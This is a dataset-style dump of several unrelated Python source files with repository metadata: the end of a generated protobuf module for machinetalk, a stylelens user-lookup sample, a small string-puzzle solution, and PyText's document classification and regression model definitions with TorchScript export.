has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='pin', full_name='machinetalk.Inst.pin', index=5,
number=16, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='param', full_name='machinetalk.Inst.param', index=6,
number=17, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='funct', full_name='machinetalk.Inst.funct', index=7,
number=19, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\313\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=3028,
serialized_end=3229,
)
_SERVICEANNOUNCEMENT.fields_by_name['stype'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SERVICETYPE
_SERVICEANNOUNCEMENT.fields_by_name['api'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SERVICEAPI
_ORIGINATOR.fields_by_name['origin'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._ORIGINTYPE
_ORIGINATOR.fields_by_name['detail'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._ORIGINDETAIL
_ORIGINATOR.fields_by_name['instance'].message_type = _INSTANCE
_ANERROR.fields_by_name['severity'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._SEVERITY
_ANERROR.fields_by_name['origin'].message_type = _ORIGINATOR
_PIN.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PIN.fields_by_name['dir'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALPINDIRECTION
_SIGNAL.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PARAM.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._VALUETYPE
_PARAM.fields_by_name['dir'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALPARAMDIRECTION
_FUNCTION.fields_by_name['type'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._HALFUNCTTYPE
_COMPONENT.fields_by_name['pin'].message_type = _PIN
_COMPONENT.fields_by_name['param'].message_type = _PARAM
_COMPONENT.fields_by_name['funct'].message_type = _FUNCTION
_MEMBER.fields_by_name['mtype'].enum_type = machinetalk_dot_protobuf_dot_types__pb2._OBJECTTYPE
_MEMBER.fields_by_name['signal'].message_type = _SIGNAL
_MEMBER.fields_by_name['pin'].message_type = _PIN
_MEMBER.fields_by_name['param'].message_type = _PARAM
_GROUP.fields_by_name['member'].message_type = _MEMBER
_INST.fields_by_name['pin'].message_type = _PIN
_INST.fields_by_name['param'].message_type = _PARAM
_INST.fields_by_name['funct'].message_type = _FUNCTION
DESCRIPTOR.message_types_by_name['Instance'] = _INSTANCE
DESCRIPTOR.message_types_by_name['ServiceAnnouncement'] = _SERVICEANNOUNCEMENT
DESCRIPTOR.message_types_by_name['Originator'] = _ORIGINATOR
DESCRIPTOR.message_types_by_name['AnError'] = _ANERROR
DESCRIPTOR.message_types_by_name['Pin'] = _PIN
DESCRIPTOR.message_types_by_name['Signal'] = _SIGNAL
DESCRIPTOR.message_types_by_name['Param'] = _PARAM
DESCRIPTOR.message_types_by_name['Function'] = _FUNCTION
DESCRIPTOR.message_types_by_name['Thread'] = _THREAD
DESCRIPTOR.message_types_by_name['Component'] = _COMPONENT
DESCRIPTOR.message_types_by_name['Ring'] = _RING
DESCRIPTOR.message_types_by_name['Member'] = _MEMBER
DESCRIPTOR.message_types_by_name['Group'] = _GROUP
DESCRIPTOR.message_types_by_name['ProtocolParameters'] = _PROTOCOLPARAMETERS
DESCRIPTOR.message_types_by_name['Vtable'] = _VTABLE
DESCRIPTOR.message_types_by_name['Inst'] = _INST
Instance = _reflection.GeneratedProtocolMessageType('Instance', (_message.Message,), dict(
DESCRIPTOR = _INSTANCE,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Instance)
))
_sym_db.RegisterMessage(Instance)
ServiceAnnouncement = _reflection.GeneratedProtocolMessageType('ServiceAnnouncement', (_message.Message,), dict(
DESCRIPTOR = _SERVICEANNOUNCEMENT,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.ServiceAnnouncement)
))
_sym_db.RegisterMessage(ServiceAnnouncement)
Originator = _reflection.GeneratedProtocolMessageType('Originator', (_message.Message,), dict(
DESCRIPTOR = _ORIGINATOR,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Originator)
))
_sym_db.RegisterMessage(Originator)
AnError = _reflection.GeneratedProtocolMessageType('AnError', (_message.Message,), dict(
DESCRIPTOR = _ANERROR,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.AnError)
))
_sym_db.RegisterMessage(AnError)
Pin = _reflection.GeneratedProtocolMessageType('Pin', (_message.Message,), dict(
DESCRIPTOR = _PIN,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Pin)
))
_sym_db.RegisterMessage(Pin)
Signal = _reflection.GeneratedProtocolMessageType('Signal', (_message.Message,), dict(
DESCRIPTOR = _SIGNAL,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Signal)
))
_sym_db.RegisterMessage(Signal)
Param = _reflection.GeneratedProtocolMessageType('Param', (_message.Message,), dict(
DESCRIPTOR = _PARAM,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Param)
))
_sym_db.RegisterMessage(Param)
Function = _reflection.GeneratedProtocolMessageType('Function', (_message.Message,), dict(
DESCRIPTOR = _FUNCTION,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Function)
))
_sym_db.RegisterMessage(Function)
Thread = _reflection.GeneratedProtocolMessageType('Thread', (_message.Message,), dict(
DESCRIPTOR = _THREAD,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Thread)
))
_sym_db.RegisterMessage(Thread)
Component = _reflection.GeneratedProtocolMessageType('Component', (_message.Message,), dict(
DESCRIPTOR = _COMPONENT,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Component)
))
_sym_db.RegisterMessage(Component)
Ring = _reflection.GeneratedProtocolMessageType('Ring', (_message.Message,), dict(
DESCRIPTOR = _RING,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Ring)
))
_sym_db.RegisterMessage(Ring)
Member = _reflection.GeneratedProtocolMessageType('Member', (_message.Message,), dict(
DESCRIPTOR = _MEMBER,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Member)
))
_sym_db.RegisterMessage(Member)
Group = _reflection.GeneratedProtocolMessageType('Group', (_message.Message,), dict(
DESCRIPTOR = _GROUP,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Group)
))
_sym_db.RegisterMessage(Group)
ProtocolParameters = _reflection.GeneratedProtocolMessageType('ProtocolParameters', (_message.Message,), dict(
DESCRIPTOR = _PROTOCOLPARAMETERS,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.ProtocolParameters)
))
_sym_db.RegisterMessage(ProtocolParameters)
Vtable = _reflection.GeneratedProtocolMessageType('Vtable', (_message.Message,), dict(
DESCRIPTOR = _VTABLE,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Vtable)
))
_sym_db.RegisterMessage(Vtable)
Inst = _reflection.GeneratedProtocolMessageType('Inst', (_message.Message,), dict(
DESCRIPTOR = _INST,
__module__ = 'machinetalk.protobuf.object_pb2'
# @@protoc_insertion_point(class_scope:machinetalk.Inst)
))
_sym_db.RegisterMessage(Inst)
_INSTANCE.has_options = True
_INSTANCE._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\274\005'))
_SERVICEANNOUNCEMENT.has_options = True
_SERVICEANNOUNCEMENT._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\275\005'))
_ORIGINATOR.has_options = True
_ORIGINATOR._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\276\005'))
_ANERROR.has_options = True
_ANERROR._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\277\005'))
_PIN.has_options = True
_PIN._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\300\005'))
_SIGNAL.has_options = True
_SIGNAL._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\301\005'))
_PARAM.has_options = True
_PARAM._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\302\005'))
_FUNCTION.has_options = True
_FUNCTION._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\303\005'))
_THREAD.has_options = True
_THREAD._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\304\005'))
_COMPONENT.has_options = True
_COMPONENT._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\305\005'))
_RING.has_options = True
_RING._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\306\005'))
_MEMBER.has_options = True
_MEMBER._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\307\005'))
_GROUP.has_options = True
_GROUP._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\310\005'))
_PROTOCOLPARAMETERS.has_options = True
_PROTOCOLPARAMETERS._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\311\005'))
_VTABLE.has_options = True
_VTABLE._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\312\005'))
_INST.has_options = True
_INST._options = _descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\313\005'))
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
d0752ea82d55e18e109b58693127c0b741fae2fe | 9d0d01fcae352e9a7d48d7a8035be775118a556e | /sample/get_user_by_device_id.py | 395098703b40be6086fb8398e22b87538f811d88 | [] | no_license | BlueLens/stylelens-user | b278faef0fd32b36355f190e4cd13b95b6e7e57c | aa3698d35c237dd022fb16824945636b0b3660e7 | refs/heads/master | 2021-09-04T20:47:27.881925 | 2018-01-22T09:28:14 | 2018-01-22T09:28:14 | 117,768,534 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 327 | py | from __future__ import print_function
from stylelens_user.users import Users
from pprint import pprint
api_instance = Users()
device_id = "xxxx"
try:
api_response = api_instance.get_user_by_device_id(device_id)
pprint(api_response)
except Exception as e:
print("Exception when calling get_user_by_device_id: %s\n" % e)
| [
"[email protected]"
] | |
1e6c9e8e59bddb832eadfc7780eebfef53aa5db6 | f0d713996eb095bcdc701f3fab0a8110b8541cbb | /fYMjhe7BnijXwfNpF_6.py | bb60873df92e89aabc853fedd429ccfe8fa9fc7e | [] | no_license | daniel-reich/turbo-robot | feda6c0523bb83ab8954b6d06302bfec5b16ebdf | a7a25c63097674c0a81675eed7e6b763785f1c41 | refs/heads/main | 2023-03-26T01:55:14.210264 | 2021-03-23T16:08:01 | 2021-03-23T16:08:01 | 350,773,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 606 | py | """
Create a function that takes a string and returns the first character of every
word if the length of the word is even and the middle character if the length
of the word is odd.
### Examples
stmid("Alexa have to paid") ➞ "ehtp"
# "e" is the middle character of "Alexa"
# "h" is the first character of "have"
stmid("Th3 0n3 4nd 0n1y") ➞ "hnn0"
stmid("who is the winner") ➞ "hihw"
### Notes
N/A
"""
def stmid(string):
lst = string.split()
txt = ''
for i in lst:
if len(i) % 2:
txt += i[(len(i) // 2)]
else:
txt += i[0]
return txt
| [
"[email protected]"
] | |
756fcf505f52ff1857548565961f6ca716d0e0ee | 8c699adc72ed1765ec4fdd1a4ea7ef77d12e870a | /pytext/models/doc_model.py | a8e58382db1b2970e267b3e9f5288b01ed54102a | [
"BSD-3-Clause"
] | permissive | haowu666/pytext | d7c592a85e437e3e4bd67de7b8ca083f0cce89ce | 8455458c101683602478b93bc8d016bd49d04323 | refs/heads/master | 2020-06-11T13:39:31.431606 | 2019-06-26T21:20:28 | 2019-06-26T21:24:24 | 193,984,662 | 0 | 0 | NOASSERTION | 2019-06-26T22:16:36 | 2019-06-26T22:16:35 | null | UTF-8 | Python | false | false | 12,291 | py | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
from typing import Dict, List, Optional, Union
import torch
from pytext.config import ConfigBase
from pytext.config.component import create_loss
from pytext.data.tensorizers import (
ByteTokenTensorizer,
FloatListTensorizer,
LabelTensorizer,
NumericLabelTensorizer,
Tensorizer,
TokenTensorizer,
)
from pytext.data.utils import PAD, UNK
from pytext.exporters.exporter import ModelExporter
from pytext.loss import BinaryCrossEntropyLoss
from pytext.models.decoders.mlp_decoder import MLPDecoder
from pytext.models.embeddings import CharacterEmbedding, EmbeddingList, WordEmbedding
from pytext.models.model import Model
from pytext.models.module import create_module
from pytext.models.output_layers import ClassificationOutputLayer, RegressionOutputLayer
from pytext.models.output_layers.doc_classification_output_layer import (
BinaryClassificationOutputLayer,
MulticlassOutputLayer,
)
from pytext.models.representations.bilstm_doc_attention import BiLSTMDocAttention
from pytext.models.representations.docnn import DocNNRepresentation
from pytext.models.representations.pure_doc_attention import PureDocAttention
from pytext.utils.torch import (
Vocabulary,
make_byte_inputs,
make_sequence_lengths,
pad_2d,
)
from torch import jit
class DocModel_Deprecated(Model):
"""
An n-ary document classification model. It can be used for all text
classification scenarios. It supports :class:`~PureDocAttention`,
:class:`~BiLSTMDocAttention` and :class:`~DocNNRepresentation` as the ways
to represent the document followed by multi-layer perceptron (:class:`~MLPDecoder`)
for projecting the document representation into label/target space.
It can be instantiated just like any other :class:`~Model`.
DEPRECATED: Use DocModel instead
"""
class Config(ConfigBase):
representation: Union[
PureDocAttention.Config,
BiLSTMDocAttention.Config,
DocNNRepresentation.Config,
] = BiLSTMDocAttention.Config()
decoder: MLPDecoder.Config = MLPDecoder.Config()
output_layer: ClassificationOutputLayer.Config = (
ClassificationOutputLayer.Config()
)
class DocModel(Model):
"""DocModel that's compatible with the new Model abstraction, which is responsible
for describing which inputs it expects and arranging its input tensors."""
__EXPANSIBLE__ = True
class Config(Model.Config):
class ModelInput(Model.Config.ModelInput):
tokens: TokenTensorizer.Config = TokenTensorizer.Config()
dense: Optional[FloatListTensorizer.Config] = None
labels: LabelTensorizer.Config = LabelTensorizer.Config()
inputs: ModelInput = ModelInput()
embedding: WordEmbedding.Config = WordEmbedding.Config()
representation: Union[
PureDocAttention.Config,
BiLSTMDocAttention.Config,
DocNNRepresentation.Config,
] = BiLSTMDocAttention.Config()
decoder: MLPDecoder.Config = MLPDecoder.Config()
output_layer: ClassificationOutputLayer.Config = (
ClassificationOutputLayer.Config()
)
def arrange_model_inputs(self, tensor_dict):
tokens, seq_lens, _ = tensor_dict["tokens"]
model_inputs = (tokens, seq_lens)
if "dense" in tensor_dict:
model_inputs += (tensor_dict["dense"],)
return model_inputs
def arrange_targets(self, tensor_dict):
return tensor_dict["labels"]
def get_export_input_names(self, tensorizers):
res = ["tokens", "tokens_lens"]
if "dense" in tensorizers:
res += ["float_vec_vals"]
return res
def get_export_output_names(self, tensorizers):
return ["scores"]
def vocab_to_export(self, tensorizers):
return {"tokens": list(tensorizers["tokens"].vocab)}
def caffe2_export(self, tensorizers, tensor_dict, path, export_onnx_path=None):
exporter = ModelExporter(
ModelExporter.Config(),
self.get_export_input_names(tensorizers),
self.arrange_model_inputs(tensor_dict),
self.vocab_to_export(tensorizers),
self.get_export_output_names(tensorizers),
)
return exporter.export_to_caffe2(self, path, export_onnx_path=export_onnx_path)
def torchscriptify(self, tensorizers, traced_model):
output_layer = self.output_layer.torchscript_predictions()
input_vocab = tensorizers["tokens"].vocab
class Model(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.model = traced_model
self.output_layer = output_layer
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
@jit.script_method
def forward(self, tokens: List[List[str]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
logits = self.model(torch.tensor(word_ids), torch.tensor(seq_lens))
return self.output_layer(logits)
class ModelWithDenseFeat(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.model = traced_model
self.output_layer = output_layer
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
@jit.script_method
def forward(self, tokens: List[List[str]], dense_feat: List[List[float]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
logits = self.model(
torch.tensor(word_ids),
torch.tensor(seq_lens),
torch.tensor(dense_feat),
)
return self.output_layer(logits)
return ModelWithDenseFeat() if "dense" in tensorizers else Model()
@classmethod
def create_embedding(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
return create_module(
config.embedding,
tensorizer=tensorizers["tokens"],
init_from_saved_state=config.init_from_saved_state,
)
@classmethod
def create_decoder(cls, config: Config, representation_dim: int, num_labels: int):
num_decoder_modules = 0
in_dim = representation_dim
if hasattr(config.inputs, "dense") and config.inputs.dense:
num_decoder_modules += 1
in_dim += config.inputs.dense.dim
decoder = create_module(config.decoder, in_dim=in_dim, out_dim=num_labels)
decoder.num_decoder_modules = num_decoder_modules
return decoder
@classmethod
def from_config(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
labels = tensorizers["labels"].vocab
embedding = cls.create_embedding(config, tensorizers)
representation = create_module(
config.representation, embed_dim=embedding.embedding_dim
)
decoder = cls.create_decoder(
config, representation.representation_dim, len(labels)
)
loss = create_loss(config.output_layer.loss)
output_layer_cls = (
BinaryClassificationOutputLayer
if isinstance(loss, BinaryCrossEntropyLoss)
else MulticlassOutputLayer
)
output_layer = output_layer_cls(list(labels), loss)
return cls(embedding, representation, decoder, output_layer)
class ByteTokensDocumentModel(DocModel):
"""
DocModel that receives both word IDs and byte IDs as inputs (concatenating
word and byte-token embeddings to represent input tokens).
"""
class Config(DocModel.Config):
class ByteModelInput(DocModel.Config.ModelInput):
token_bytes: ByteTokenTensorizer.Config = ByteTokenTensorizer.Config()
inputs: ByteModelInput = ByteModelInput()
byte_embedding: CharacterEmbedding.Config = CharacterEmbedding.Config()
@classmethod
def create_embedding(cls, config, tensorizers: Dict[str, Tensorizer]):
word_tensorizer = config.inputs.tokens
byte_tensorizer = config.inputs.token_bytes
assert word_tensorizer.column == byte_tensorizer.column
word_embedding = create_module(
config.embedding, tensorizer=tensorizers["tokens"]
)
byte_embedding = CharacterEmbedding(
ByteTokenTensorizer.NUM_BYTES,
config.byte_embedding.embed_dim,
config.byte_embedding.cnn.kernel_num,
config.byte_embedding.cnn.kernel_sizes,
config.byte_embedding.highway_layers,
config.byte_embedding.projection_dim,
)
return EmbeddingList([word_embedding, byte_embedding], concat=True)
def arrange_model_inputs(self, tensor_dict):
tokens, seq_lens, _ = tensor_dict["tokens"]
token_bytes, byte_seq_lens, _ = tensor_dict["token_bytes"]
assert (seq_lens == byte_seq_lens).all().item()
return tokens, token_bytes, seq_lens
def get_export_input_names(self, tensorizers):
return ["tokens", "token_bytes", "tokens_lens"]
def torchscriptify(self, tensorizers, traced_model):
output_layer = self.output_layer.torchscript_predictions()
max_byte_len = tensorizers["token_bytes"].max_byte_len
byte_offset_for_non_padding = tensorizers["token_bytes"].offset_for_non_padding
input_vocab = tensorizers["tokens"].vocab
class Model(jit.ScriptModule):
def __init__(self):
super().__init__()
self.vocab = Vocabulary(input_vocab, unk_idx=input_vocab.idx[UNK])
self.max_byte_len = jit.Attribute(max_byte_len, int)
self.byte_offset_for_non_padding = jit.Attribute(
byte_offset_for_non_padding, int
)
self.pad_idx = jit.Attribute(input_vocab.idx[PAD], int)
self.model = traced_model
self.output_layer = output_layer
@jit.script_method
def forward(self, tokens: List[List[str]]):
seq_lens = make_sequence_lengths(tokens)
word_ids = self.vocab.lookup_indices_2d(tokens)
word_ids = pad_2d(word_ids, seq_lens, self.pad_idx)
token_bytes, _ = make_byte_inputs(
tokens, self.max_byte_len, self.byte_offset_for_non_padding
)
logits = self.model(
torch.tensor(word_ids), token_bytes, torch.tensor(seq_lens)
)
return self.output_layer(logits)
return Model()
class DocRegressionModel(DocModel):
"""
Model that's compatible with the new Model abstraction, and is configured for
regression tasks (specifically for labels, predictions, and loss).
"""
class Config(DocModel.Config):
class RegressionModelInput(DocModel.Config.ModelInput):
tokens: TokenTensorizer.Config = TokenTensorizer.Config()
labels: NumericLabelTensorizer.Config = NumericLabelTensorizer.Config()
inputs: RegressionModelInput = RegressionModelInput()
output_layer: RegressionOutputLayer.Config = RegressionOutputLayer.Config()
@classmethod
def from_config(cls, config: Config, tensorizers: Dict[str, Tensorizer]):
embedding = cls.create_embedding(config, tensorizers)
representation = create_module(
config.representation, embed_dim=embedding.embedding_dim
)
decoder = create_module(
config.decoder, in_dim=representation.representation_dim, out_dim=1
)
output_layer = RegressionOutputLayer.from_config(config.output_layer)
return cls(embedding, representation, decoder, output_layer)
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.